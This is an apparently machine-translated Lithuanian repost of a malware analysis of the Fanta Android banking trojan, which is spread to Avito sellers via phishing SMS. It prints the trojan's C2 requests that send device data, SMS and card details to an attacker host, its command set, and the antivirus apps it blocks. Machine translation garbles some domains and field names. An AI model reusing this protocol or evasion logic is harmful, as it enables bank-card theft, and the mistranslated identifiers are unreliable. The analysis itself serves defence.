ProHoster > Dienoraštis > interneto naujienos > Leysya, Fanta: nauja taktika senam Android Trojos arkliui

Leysya, Fanta: nauja taktika senam Android Trojos arkliui

Leysya, Fanta: nauja taktika senam Android Trojos arkliui

Vieną dieną norite ką nors parduoti Avito ir, paskelbę išsamų savo produkto aprašymą (pavyzdžiui, RAM modulį), gausite šį pranešimą:

Leysya, Fanta: nauja taktika senam Android Trojos arkliuiAtidarę nuorodą, pamatysite iš pažiūros nekenksmingą puslapį, pranešantį jums, laimingam ir sėkmingam pardavėjui, kad pirkote:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui
Kai spustelėsite mygtuką „Tęsti“, į „Android“ įrenginį bus atsisiųstas APK failas su piktograma ir pasitikėjimą skatinančiu pavadinimu. Įdiegėte programą, kuri kažkodėl prašė AccessibilityService teisių, tada atsirado pora langų ir greitai dingo ir... Viskas.

Einate patikrinti likučio, bet dėl ​​kokių nors priežasčių jūsų banko programa vėl prašo kortelės duomenų. Suvedus duomenis nutinka kažkas baisaus: dėl kažkokios vis dar tau neaiškios priežasties iš sąskaitos pradeda dingti pinigai. Bandote išspręsti problemą, bet jūsų telefonas priešinasi: spaudžia mygtukus „Atgal“ ir „Pagrindinis“, neišsijungia ir neleidžia įjungti jokių apsaugos priemonių. Dėl to jūs liekate be pinigų, jūsų prekės neįsigytos, sutrinka ir stebisi: kas atsitiko?

Atsakymas paprastas: tapote „Android Trojan Fanta“, „Flexnet“ šeimos nario, auka. Kaip tai nutiko? Paaiškinkime dabar.

Autoriai: Andrejus Polovinkinas, jaunesnysis kenkėjiškų programų analizės specialistas, Ivanas Pisarevas, kenkėjiškų programų analizės specialistas.

Kai kurie statistiniai duomenys

„Android“ Trojos arklių „Flexnet“ šeima pirmą kartą tapo žinoma dar 2015 m. Per gana ilgą veiklos laikotarpį šeima išsiplėtė iki kelių porūšių: Fanta, Limebot, Lipton ir kt. Trojos arklys, kaip ir su juo susijusi infrastruktūra, nestovi vietoje: kuriamos naujos efektyvios platinimo schemos – mūsų atveju aukštos kokybės sukčiavimo puslapiai, skirti konkretaus vartotojo-pardavėjo atžvilgiu, o Trojos arklių kūrėjai seka madingas tendencijas. virusų rašymas – pridedamas naujas funkcionalumas, leidžiantis efektyviau vogti pinigus iš užkrėstų įrenginių ir apeiti apsaugos mechanizmus.

Šiame straipsnyje aprašyta kampanija skirta vartotojams iš Rusijos, Ukrainoje užfiksuota nedaug užkrėstų įrenginių, dar mažiau – Kazachstane ir Baltarusijoje.

Nors „Flexnet“ yra „Android“ Trojos arenoje jau daugiau nei 4 metus ir buvo išsamiai ištirtas daugelio tyrinėtojų, jis vis dar yra geros būklės. Nuo 2019 m. sausio mėn. galimas žalos dydis siekia daugiau nei 35 milijonus rublių – ir tai tik kampanijoms Rusijoje. 2015 metais įvairios šio Android Trojos arklys versijos buvo pardavinėjamos pogrindiniuose forumuose, kuriuose buvo galima rasti ir Trojos arklys šaltinio kodą su išsamiu aprašymu. Tai reiškia, kad žalos statistika pasaulyje yra dar įspūdingesnė. Neblogas rodiklis tokiam senoliui, ar ne?

Leysya, Fanta: nauja taktika senam Android Trojos arkliui

Nuo pardavimo iki apgaulės

Kaip matyti iš anksčiau pateiktos „Avito“ interneto paslaugos, skirtos skelbimams skelbti, sukčiavimo puslapio ekrano kopijos, ji buvo parengta konkrečiai aukai. Akivaizdu, kad užpuolikai naudoja vieną iš „Avito“ analizatorių, kuris išgauna pardavėjo telefono numerį ir pavadinimą, taip pat prekės aprašymą. Išplėtus puslapį ir paruošus APK failą, nukentėjusiajam išsiunčiama SMS žinutė su jo vardu ir nuoroda į sukčiavimo puslapį, kuriame yra jo prekės aprašymas ir suma, gauta iš prekės „pardavimo“. Paspaudęs mygtuką, vartotojas gauna kenkėjišką APK failą – Fanta.

Domeno shcet491[.]ru tyrimas parodė, kad jis yra deleguotas Hostinger DNS serveriams:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Domeno zonos faile yra įrašų, nukreipiančių į IP adresus 31.220.23[.]236, 31.220.23[.]243 ir 31.220.23[.]235. Tačiau domeno pirminis išteklių įrašas (A įrašas) nurodo serverį, kurio IP adresas yra 178.132.1[.]240.

IP adresas 178.132.1[.]240 yra Nyderlanduose ir priklauso prieglobos serveriui Pasaulio srautas. IP adresai 31.220.23[.]235, 31.220.23[.]236 ir 31.220.23[.]243 yra JK ir priklauso bendro prieglobos serveriui HOSTINGER. Naudotas kaip registratorius openprov-ru. Šie domenai taip pat nustatyti IP adresu 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Reikėtų pažymėti, kad šio formato nuorodos buvo prieinamos beveik visuose domenuose:

http://(www.){0,1}<%domain%>/[0-9]{7}

Šiame šablone taip pat yra nuoroda iš SMS žinutės. Remiantis istoriniais duomenimis, buvo nustatyta, kad vienas domenas atitinka kelias aukščiau aprašyto modelio nuorodas, o tai rodo, kad vienas domenas buvo naudojamas platinant Trojos arklys kelioms aukoms.

Peršokime šiek tiek į priekį: Trojos arklys, atsisiųstas per nuorodą iš SMS, naudoja adresą kaip valdymo serverį onusedseddohap[.]klubas. Šis domenas buvo užregistruotas 2019-03-12, o nuo 2019-04-29 APK programos sąveikavo su šiuo domenu. Remiantis duomenimis, gautais iš VirusTotal, iš viso su šiuo serveriu sąveikavo 109 programos. Pats domenas išspręstas pagal IP adresą 217.23.14[.]27, esantis Nyderlanduose ir priklausantis šeimininkui Pasaulio srautas. Naudotas kaip registratorius vardo šauksmas. Domenai taip pat nustatyti šiuo IP adresu bad-racon[.]klubas (nuo 2018-09-25) ir bad-racoon[.]gyvai (nuo 2018-10-25). Su domenu bad-racon[.]klubas su daugiau nei 80 APK failų bad-racoon[.]gyvai - daugiau nei 100.

Apskritai ataka vyksta taip:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui

Kas slypi po Fantos dangčiu?

Kaip ir daugelis kitų Android Trojos arklių, Fanta gali skaityti ir siųsti SMS žinutes, teikti USSD užklausas ir rodyti savo langus programų viršuje (įskaitant bankines). Tačiau šios šeimos funkcionalumo arsenalas pasiekė: Fanta pradėjo naudoti Prieinamumo paslauga įvairiems tikslams: skaityti pranešimų turinį iš kitų programų, užkirsti kelią Trojos arklys aptikti ir sustabdyti užkrėstame įrenginyje ir kt. „Fanta“ veikia visose ne jaunesnėse nei 4.4 „Android“ versijose. Šiame straipsnyje atidžiau pažvelgsime į šį „Fanta“ pavyzdį:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Iš karto po paleidimo

Iš karto po paleidimo Trojos arklys paslepia savo piktogramą. Programa gali veikti tik tuo atveju, jei užkrėsto įrenginio pavadinimo sąraše nėra:

  • android_x86
  • VirtualBox
  • „Nexus 5X“
  • „Nexus 5“ (skustuvas)

Šis patikrinimas atliekamas pagrindinėje Trojos arklys Pagrindinė paslauga. Paleidus pirmą kartą, programos konfigūracijos parametrai inicijuojami į numatytąsias reikšmes (konfigūracijos duomenų saugojimo formatas ir jų reikšmė bus aptarti vėliau), o valdymo serveryje registruojamas naujas užkrėstas įrenginys. Serveriui bus išsiųsta HTTP POST užklausa su pranešimo tipu registro_botas ir informacija apie užkrėstą įrenginį (Android versija, IMEI, telefono numeris, operatoriaus pavadinimas ir šalies kodas, kurioje operatorius registruotas). Adresas naudojamas kaip valdymo serveris hXXp://onuseseddohap[.]club/controller.php. Atsakydamas, serveris siunčia pranešimą su laukeliais bot_id, bot_pwd, serveris - programa išsaugo šias reikšmes kaip CnC serverio parametrus. Parametras serveris neprivaloma, jei laukas nebuvo gautas: Fanta naudoja registracijos adresą - hXXp://onuseseddohap[.]club/controller.php. CnC adreso keitimo funkcija gali būti naudojama sprendžiant dvi problemas: tolygiai paskirstyti apkrovą tarp kelių serverių (jei yra daug užkrėstų įrenginių, neoptimizuoto žiniatinklio serverio apkrova gali būti didelė), taip pat naudoti alternatyvus serveris sugedus vienam iš CnC serverių.

Jei siunčiant užklausą įvyksta klaida, Trojos arklys pakartos registracijos procesą po 20 sekundžių.

Sėkmingai užregistravus įrenginį, Fanta vartotojui parodys tokį pranešimą:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui
Svarbi pastaba: tarnyba paskambino Sistemos saugumas — Trojos arklys paslaugos pavadinimas ir spustelėjus mygtuką ОК Atsidarys langas su užkrėsto įrenginio pritaikymo neįgaliesiems nustatymais, kuriame vartotojas turi suteikti kenkėjiškos paslaugos prieinamumo teises:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui
Kai tik vartotojas įsijungia Prieinamumo paslauga, Fanta įgyja prieigą prie programų langų turinio ir juose atliekamų veiksmų:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui
Iškart gavęs prieinamumo teises, Trojos arklys paprašo administratoriaus teisių ir teisių skaityti pranešimus:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui
Naudodama AccessibilityService, programa imituoja klavišų paspaudimus, taip suteikdama sau visas reikalingas teises.

Fanta sukuria kelis duomenų bazės egzempliorius (kurie bus aprašyti vėliau), reikalingus konfigūracijos duomenims saugoti, taip pat proceso metu surinktai informacijai apie užkrėstą įrenginį. Norėdami išsiųsti surinktą informaciją, Trojos arklys sukuria pasikartojančią užduotį, skirtą atsisiųsti laukus iš duomenų bazės ir gauti komandą iš valdymo serverio. Prieigos prie CnC intervalas nustatomas priklausomai nuo Android versijos: 5.1 atveju intervalas bus 10 sekundžių, kitu atveju 60 sekundžių.

Kad gautų komandą, Fanta pateikia prašymą GetTask į valdymo serverį. Atsakydamas, CnC gali išsiųsti vieną iš šių komandų:

Komanda aprašymas
0 Siųsti SMS žinutę
1 Skambinkite telefonu arba atlikite USSD komandą
2 Atnaujina parametrą intervalas
3 Atnaujina parametrą perimti
6 Atnaujina parametrą sms Manager
9 Pradėkite rinkti SMS žinutes
11 Atkurkite telefono gamyklinius nustatymus
12 Įjungti / išjungti dialogo lango kūrimo registravimą

„Fanta“ taip pat renka pranešimus iš 70 bankinių programėlių, greitųjų mokėjimų sistemų bei elektroninių piniginių ir saugo juos duomenų bazėje.

Konfigūracijos parametrų saugojimas

Norėdami išsaugoti konfigūracijos parametrus, „Fanta“ naudoja standartinį „Android“ platformos metodą - Nustatymai- failai. Nustatymai bus įrašyti į failą pavadinimu settings. Išsaugotų parametrų aprašymas yra žemiau esančioje lentelėje.

pavadinimas Numatytoji reikšmė Galimos vertės aprašymas
id 0 Sveikasis skaičius Boto ID
serveris hXXp://onuseseddohap[.]club/ URL adresas Valdykite serverio adresą
pwd - Styginių Serverio slaptažodis
intervalas 20 Sveikasis skaičius Laiko intervalas. Nurodo, kiek laiko reikia atidėti šias užduotis:

  • Siunčiant užklausą apie išsiųstos SMS žinutės būseną
  • Naujos komandos gavimas iš valdymo serverio
perimti visi visi/telNumber Jei laukas lygus eilutei visi arba telNumber, tada gautas SMS pranešimas bus perimtas programos ir nebus rodomas vartotojui
sms Manager 0 0/1 Įjungti / išjungti programą kaip numatytąjį SMS gavėją
Skaityti Dialogą klaidingas Tiesa/netiesa Įjungti / išjungti įvykių registravimą Prieinamumo įvykis

Fanta taip pat naudoja failą sms Manager:

pavadinimas Numatytoji reikšmė Galimos vertės aprašymas
pckg - Styginių Naudojamo SMS žinučių tvarkyklės pavadinimas

Sąveika su duomenų bazėmis

Savo veikimo metu Trojos arklys naudoja dvi duomenų bazes. Duomenų bazė pavadinta a naudojamas įvairiai iš telefono surinktai informacijai saugoti. Antroji duomenų bazė pavadinta fanta.db ir naudojamas norint išsaugoti nustatymus, atsakingus už sukčiavimo langų, skirtų informacijai apie banko korteles rinkti, kūrimą.

Trojos arklys naudoja duomenų bazę а saugoti surinktą informaciją ir registruoti savo veiksmus. Duomenys saugomi lentelėje žurnalai. Norėdami sukurti lentelę, naudokite šią SQL užklausą:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Duomenų bazėje yra ši informacija:

1. Užkrėsto įrenginio paleidimo registravimas pranešimu Telefonas įsijungė!

2. Pranešimai iš programų. Pranešimas generuojamas pagal šį šabloną:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Banko kortelių duomenys iš Trojos arklys sukurtų sukčiavimo formų. Parametras VIEW_NAME gali būti vienas iš šių:

  • AliExpress
  • Avito
  • "Google Play"
  • Įvairūs <%App Name%>

Pranešimas registruojamas tokiu formatu:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Gaunamos/išeinančios SMS žinutės tokiu formatu:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informacija apie paketą, kuris sukuria dialogo langą tokiu formatu:

(<%Package name%>)<%Package information%>

Lentelės pavyzdys žurnalai:

Leysya, Fanta: nauja taktika senam Android Trojos arkliui
Viena iš Fantos funkcijų – informacijos apie banko korteles rinkimas. Duomenys renkami sukuriant sukčiavimo langus atidarant banko programas. Trojos arklys sukuria sukčiavimo langą tik vieną kartą. Informacija, kad langas buvo parodytas vartotojui, saugoma lentelėje settings duomenų bazėje fanta.db. Norėdami sukurti duomenų bazę, naudokite šią SQL užklausą:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Visi lentelės laukai settings pagal numatytuosius nustatymus inicijuojamas 1 (sukurkite sukčiavimo langą). Vartotojui įvedus savo duomenis, reikšmė bus nustatyta į 0. Lentelės laukų pavyzdys settings:

  • gali_prisijungti — laukas yra atsakingas už formos rodymą atidarant banko paraišką
  • pirmasis_bankas - nėra naudojamas
  • can_avito — laukas yra atsakingas už formos rodymą atidarant „Avito“ programą
  • can_ali — laukas yra atsakingas už formos rodymą atidarant „Aliexpress“ programą
  • gali_kitas — laukas yra atsakingas už formos rodymą atidarant bet kurią paraišką iš sąrašo: „Yula“, „Pandao“, „Drom Auto“, „Piniginė“. Nuolaidų ir premijų kortelės, Aviasales, Rezervavimas, Trivago
  • can_card — laukas yra atsakingas už formos rodymą atidarant "Google Play"

Sąveika su valdymo serveriu

Tinklo sąveika su valdymo serveriu vyksta per HTTP protokolą. Norėdami dirbti su tinklu, „Fanta“ naudoja populiarią „Retrofit“ biblioteką. Prašymai siunčiami adresu: hXXp://onuseseddohap[.]club/controller.php. Serverio adresas gali būti pakeistas registruojantis serveryje. Atsakant iš serverio gali būti siunčiami slapukai. Fanta pateikia serveriui šias užklausas:

  • Botas užregistruojamas valdymo serveryje vieną kartą, pirmą kartą paleidus. Į serverį siunčiami šie duomenys apie užkrėstą įrenginį:
    · sausainis - iš serverio gauti slapukai (numatytoji reikšmė yra tuščia eilutė)
    · režimas — stygų konstanta registro_botas
    · priešdėlis — sveikųjų skaičių konstanta 2
    · version_sdk - sudaromas pagal šį šabloną: <%Build.MODEL%>/<%Build.VERSION.RELEASE%> (Avit)
    · imei — užkrėsto įrenginio IMEI
    · šalis — šalies, kurioje operatorius registruotas, kodas ISO formatu
    · skaičius - telefono numeris
    · operatorius - operatoriaus vardas

    Serveriui išsiųstos užklausos pavyzdys:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Atsakydamas į užklausą, serveris turi grąžinti JSON objektą su šiais parametrais:
    · bot_id — užkrėsto įrenginio ID. Jei bot_id yra lygus 0, Fanta iš naujo įvykdys užklausą.
    bot_pwd — serverio slaptažodis.
    serveris - valdyti serverio adresą. Pasirenkamas parametras. Jei parametras nenurodytas, bus naudojamas programoje išsaugotas adresas.

    JSON objekto pavyzdys:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Prašymas gauti komandą iš serverio. Į serverį siunčiami šie duomenys:
    · sausainis — iš serverio gauti slapukai
    · kainos pasiūlymas — užkrėsto įrenginio ID, kuris buvo gautas siunčiant užklausą registro_botas
    · pwd - serverio slaptažodis
    · divice_admin — lauke nustatoma, ar buvo gautos administratoriaus teisės. Jei buvo gautos administratoriaus teisės, laukas yra lygus 1, kitaip 0
    · prieinamumas — Prieinamumo paslaugos veikimo būsena. Jei paslauga buvo paleista, vertė yra 1, kitaip 0
    · SMS tvarkyklė — rodo, ar Trojos arklys įjungtas kaip numatytoji programa SMS žinutėms gauti
    · ekranas - rodo, kokioje būsenoje yra ekranas. Vertė bus nustatyta 1, jei ekranas įjungtas, kitaip 0;

    Serveriui išsiųstos užklausos pavyzdys:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Priklausomai nuo komandos, serveris gali grąžinti JSON objektą su skirtingais parametrais:

    · Komanda Siųsti SMS žinutę: parametruose yra telefono numeris, SMS žinutės tekstas ir siunčiamos žinutės ID. Identifikatorius naudojamas siunčiant pranešimą serveriui su tipu setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Komanda Skambinkite telefonu arba atlikite USSD komandą: telefono numeris arba komanda pateikiama atsakymo tekste. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Komanda Keisti intervalo parametrą. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Komanda Pakeiskite pertraukos parametrą. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Komanda Pakeiskite SmsManager lauką. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Komanda Surinkite SMS žinutes iš užkrėsto įrenginio.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Komanda Atkurkite telefono gamyklinius nustatymus: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Komanda Pakeiskite ReadDialog parametrą. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Pranešimo siuntimas su tipu setSmsStatus. Šis prašymas pateikiamas įvykdžius komandą Siųsti SMS žinutę. Prašymas atrodo taip:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Duomenų bazės turinio įkėlimas. Vienai užklausai perduodama viena eilutė. Į serverį siunčiami šie duomenys:
    · sausainis — iš serverio gauti slapukai
    · režimas — stygų konstanta setSaveInboxSms
    · kainos pasiūlymas — užkrėsto įrenginio ID, kuris buvo gautas siunčiant užklausą registro_botas
    · tekstas — tekstas esamame duomenų bazės įraše (laukas d nuo stalo žurnalai duomenų bazėje а)
    · skaičius — esamo duomenų bazės įrašo pavadinimas (laukas p nuo stalo žurnalai duomenų bazėje а)
    · sms_mode — sveikasis skaičius (laukas m nuo stalo žurnalai duomenų bazėje а)

    Prašymas atrodo taip:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Jei sėkmingai išsiųsta į serverį, eilutė bus ištrinta iš lentelės. JSON objekto, kurį grąžino serveris, pavyzdys:

    {
    "response":[],
    "status":"ok"
}

Sąveika su AccessibilityService

„AccessibilityService“ buvo įdiegta siekiant palengvinti „Android“ įrenginių naudojimą žmonėms su negalia. Daugeliu atvejų norint sąveikauti su programa reikalinga fizinė sąveika. „AccessibilityService“ leidžia juos atlikti programiškai. „Fanta“ naudoja paslaugą, kad sukurtų netikrus langus banko programose ir neleistų vartotojams atidaryti sistemos nustatymų ir kai kurių programų.

Naudodamas AccessibilityService funkcionalumą, Trojos arklys stebi užkrėsto įrenginio ekrano elementų pakeitimus. Kaip aprašyta anksčiau, Fanta nustatymuose yra parametras, atsakingas už registravimo operacijas su dialogo langeliais - Skaityti Dialogą. Jei šis parametras nustatytas, į duomenų bazę bus įtraukta informacija apie paketo, kuris suaktyvino įvykį, pavadinimą ir aprašymą. Trojos arklys atlieka šiuos veiksmus, kai suaktyvinami įvykiai:

  • Imituoja grįžimo ir pradžios klavišų paspaudimą šiais atvejais:
    · jei vartotojas nori iš naujo paleisti įrenginį
    · jei vartotojas nori ištrinti „Avito“ programą arba pakeisti prieigos teises
    · jei puslapyje minima programa „Avito“.
    · atidarius „Google Play Protect“ programą
    · atidarant puslapius su AccessibilityService nustatymais
    · kai pasirodys dialogo langas System Security
    · atidarant puslapį su „Piešimas ant kitos programos“ nustatymais
    · atidarius puslapį „Programos“, „Atkūrimas ir nustatymas iš naujo“, „Duomenų nustatymas iš naujo“, „Atstatyti nustatymus“, „Kūrėjų skydelis“, „Specialus. galimybės“, „Ypatingos galimybės“, „Ypatingos teisės“
    · jei įvykį sugeneravo tam tikros programos.

    Programų sąrašas

    • androidas
    • Master Lite
    • Švarus meistras
    • Clean Master x86 procesoriui
    • „Meizu“ programos leidimų valdymas
    • MIUI sauga
    • „Clean Master“ – antivirusinė programa, talpyklos ir šiukšlių valiklis
    • Tėvų kontrolė ir GPS: Kaspersky SafeKids
    • „Kaspersky Antivirus AppLock“ ir „Web Security Beta“.
    • Virusų valiklis, antivirusinė priemonė, valiklis (MAX Security)
    • Mobile AntiVirus Security PRO
    • „Avast“ antivirusinė programa ir nemokama apsauga 2019 m
    • Mobilioji sauga MegaFon
    • AVG apsauga, skirta Xperia
    • Mobilioji sauga
    • „Malwarebytes“ antivirusinė programa ir apsauga
    • Antivirusinė programa, skirta Android 2019
    • Saugumo meistras - Antivirusinė programa, VPN, AppLock, Booster
    • AVG antivirusinė programa, skirta Huawei planšetinio kompiuterio sistemos tvarkyklei
    • „Samsung“ pritaikymas neįgaliesiems
    • „Samsung Smart Manager“.
    • Saugumo meistras
    • Greičio stiprintuvas
    • Dr.Web
    • „Dr.Web“ saugumo erdvė
    • Dr.Web mobiliojo valdymo centras
    • Dr.Web Security Space Life
    • Dr.Web mobiliojo valdymo centras
    • Antivirusinė ir mobiliojo saugumo sistema
    • Kaspersky Internet Security: antivirusinė ir apsauga
    • „Kaspersky“ akumuliatoriaus veikimo laikas: taupymas ir stiprintuvas
    • Kaspersky Endpoint Security – apsauga ir valdymas
    • AVG Antivirus free 2019 – apsauga, skirta „Android“.
    • Android Antivirus
    • Norton Mobile Security ir Antivirus
    • Antivirusinė, ugniasienė, VPN, mobiliojo ryšio sauga
    • Mobilioji sauga: antivirusinė, VPN, apsauga nuo vagysčių
    • Antivirusinė, skirta Android

  • Jei siunčiant SMS žinutę trumpuoju numeriu prašoma leidimo, Fanta imituoja žymės langelio paspaudimą Prisiminkite pasirinkimą ir mygtukas siųsti.
  • Kai bandote atimti administratoriaus teises iš Trojos arklys, jis užrakina telefono ekraną.
  • Neleidžia pridėti naujų administratorių.
  • Jei antivirusinė programa dr.web aptiko grėsmę, Fanta imituoja mygtuko paspaudimą ignoruoti.
  • Trojos arklys imituoja grįžimo ir namų mygtukų paspaudimą, jei įvykį sugeneravo programa „Samsung“ įrenginių priežiūra.
  • „Fanta“ sukuria sukčiavimo langus su formomis informacijai apie banko korteles įvesti, jei buvo paleista programa iš maždaug 30 skirtingų interneto paslaugų sąrašo. Tarp jų: ​​„AliExpress“, „Booking“, „Avito“, „Google Play Market Component“, „Pandao“, „Drom Auto“ ir kt.

    Sukčiavimo formos

    Fanta analizuoja, kurios programos veikia užkrėstame įrenginyje. Jei buvo atidaryta dominanti programa, Trojos arklys ant visų kitų rodo sukčiavimo langą, kuris yra banko kortelės informacijos įvedimo forma. Vartotojas turi įvesti šiuos duomenis:

    • Kortelės numeris
    • Kortelės galiojimo laikas
    • CVV
    • Kortelės turėtojo vardas (ne visų bankų)

    Atsižvelgiant į veikiančią programą, bus rodomi skirtingi sukčiavimo langai. Žemiau pateikiami kai kurių iš jų pavyzdžiai:

    „Aliexpress“:

    Leysya, Fanta: nauja taktika senam Android Trojos arkliui
    Avito:

    Leysya, Fanta: nauja taktika senam Android Trojos arkliui
    Kai kurioms kitoms programoms, pvz. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: nauja taktika senam Android Trojos arkliui

    Kaip buvo iš tikrųjų

    Laimei, straipsnio pradžioje aprašytą SMS žinutę gavęs asmuo pasirodė esąs kibernetinio saugumo specialistas. Todėl tikroji, ne režisieriaus versija skiriasi nuo anksčiau pasakytos: žmogus gavo įdomią SMS žinutę, po kurios perdavė ją Grupės-IB grėsmių medžioklės žvalgybos komandai. Išpuolio rezultatas – šis straipsnis. Laiminga pabaiga, tiesa? Tačiau ne visos istorijos baigiasi taip sėkmingai, o kad jūsų neatrodytų kaip režisieriaus kirpimas su pinigų praradimu, daugeliu atvejų pakanka laikytis šių seniai aprašytų taisyklių:

    • nediekite programų mobiliesiems įrenginiams su Android OS iš kitų šaltinių, išskyrus Google Play
    • Diegdami programą atkreipkite ypatingą dėmesį į programos reikalaujamas teises
    • atkreipkite dėmesį į atsisiųstų failų plėtinius
    • reguliariai diegti Android OS naujinimus
    • nesilankykite įtartinuose šaltiniuose ir neatsisiųskite iš ten failų
    • Nespauskite SMS žinutėmis gautų nuorodų.

Šaltinis: www.habr.com

Добавить комментарий